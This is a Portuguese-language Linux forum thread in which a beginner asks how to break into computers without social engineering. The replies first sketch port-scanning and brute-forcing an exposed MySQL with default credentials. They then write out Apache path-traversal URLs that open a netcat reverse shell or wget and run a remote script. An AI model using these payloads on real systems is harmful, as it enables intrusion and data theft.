invadir sem engenharia social

1. invadir sem engenharia social

Felipe Rafael De
onovatoemlinux

(usa Kali)

Enviado em 28/10/2021 - 16:27h

oi amigos, ja estudei faz meses a até hoje nunca aprendi como invadir um computador sem ser por um trojan por exemplo, alguém poderia me dar uma breve aula de como faz isso, um exemplo é explorar as portas ( que não sei como faz )


  


2. Re: invadir sem engenharia social

Cézar Augusto
cizordj

(usa Debian)

Enviado em 04/11/2021 - 12:04h

Uma coisa boba, mas que pode ser usada para ilustrar é você pegar o IP público da máquina de um desenvolvedor, escanear quais portas estão abertas nele e fazer um ataque de força bruta em cima disso. Exemplo, um desenvolvedor está rodando uma instância do MySQL em sua máquina com os dados de uma empresa, o MySql está rodando na porta 3306 e ela está aberta para o público, você pode tentar logar usando o usuário e senha padrão do MySql, se o desenvolvedor for descuidado e não trocou a senha padrão então você obterá acesso e poderá fazer um dump dos dados dele.

Isso é só um exemplo, não faça isso!


3. Re: invadir sem engenharia social

Felipe Rafael De
onovatoemlinux

(usa Kali)

Enviado em 09/11/2021 - 18:28h

cizordj escreveu:

Uma coisa boba, mas que pode ser usada para ilustrar é você pegar o IP público da máquina de um desenvolvedor, escanear quais portas estão abertas nele e fazer um ataque de força bruta em cima disso. Exemplo, um desenvolvedor está rodando uma instância do MySQL em sua máquina com os dados de uma empresa, o MySql está rodando na porta 3306 e ela está aberta para o público, você pode tentar logar usando o usuário e senha padrão do MySql, se o desenvolvedor for descuidado e não trocou a senha padrão então você obterá acesso e poderá fazer um dump dos dados dele.

Isso é só um exemplo, não faça isso!

ok, mas quando escaneio as portas do meu ip publico não aparece quais estão abertas (nmap)
e o hydra por exemplo funciona pra fazer esse brute force?



4. Re:

Rafael Grether
rafael_grether

(usa FreeBSD)

Enviado em 10/11/2021 - 18:35h

Explorar portas abertas não significa que o computador remoto esteja vulnerável.
Tudo vai depender se o serviço que está rodando naquela porta está vulnerável.

"Ah da fazer por Bruteforce"

Bruteforce é uma vulnerabilidade, e tem como bloquear.

Um exemplo recente foi a vulnerabilidade do apache de mês atrás, que permitia a execução de comandos arbitrários no sistema.
Ex: www.site.com.br/cgi-bin/.%2e/.%2e/.%2e/.%2e/COMANDO

Com isso, voce poderia até invocar o netcat pra criar um shell reverso pra sua maquina, tipo:
www.site.com.br/cgi-bin/.%2e/.%2e/.%2e/.%2e/usr/bin/nc <ip> <porta> -e /bin/sh

Ou baixar um script malicioso pra executar na maquina:
www.site.com.br/cgi-bin/.%2e/.%2e/.%2e/.%2e/usr/local/bin/wget https://IP/arquivo.sh && chmod +x arquivo.sh && /bin/sh arquivo.sh

Essa falha foi explorada ativamente. Olha uma tentativa desses acessos no meu servidor.
A Apache corrigiu, mas muitas maquinas foram danificadas.

Fique atento sempre as falhas relatadas na CVE, para saber quando e descobrir como explorar uma vulnerabilidade.
Descobrir as portas abertas é só o primeiro passo, mas de longe é o mais importante, é só uma pequena etapa.






Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts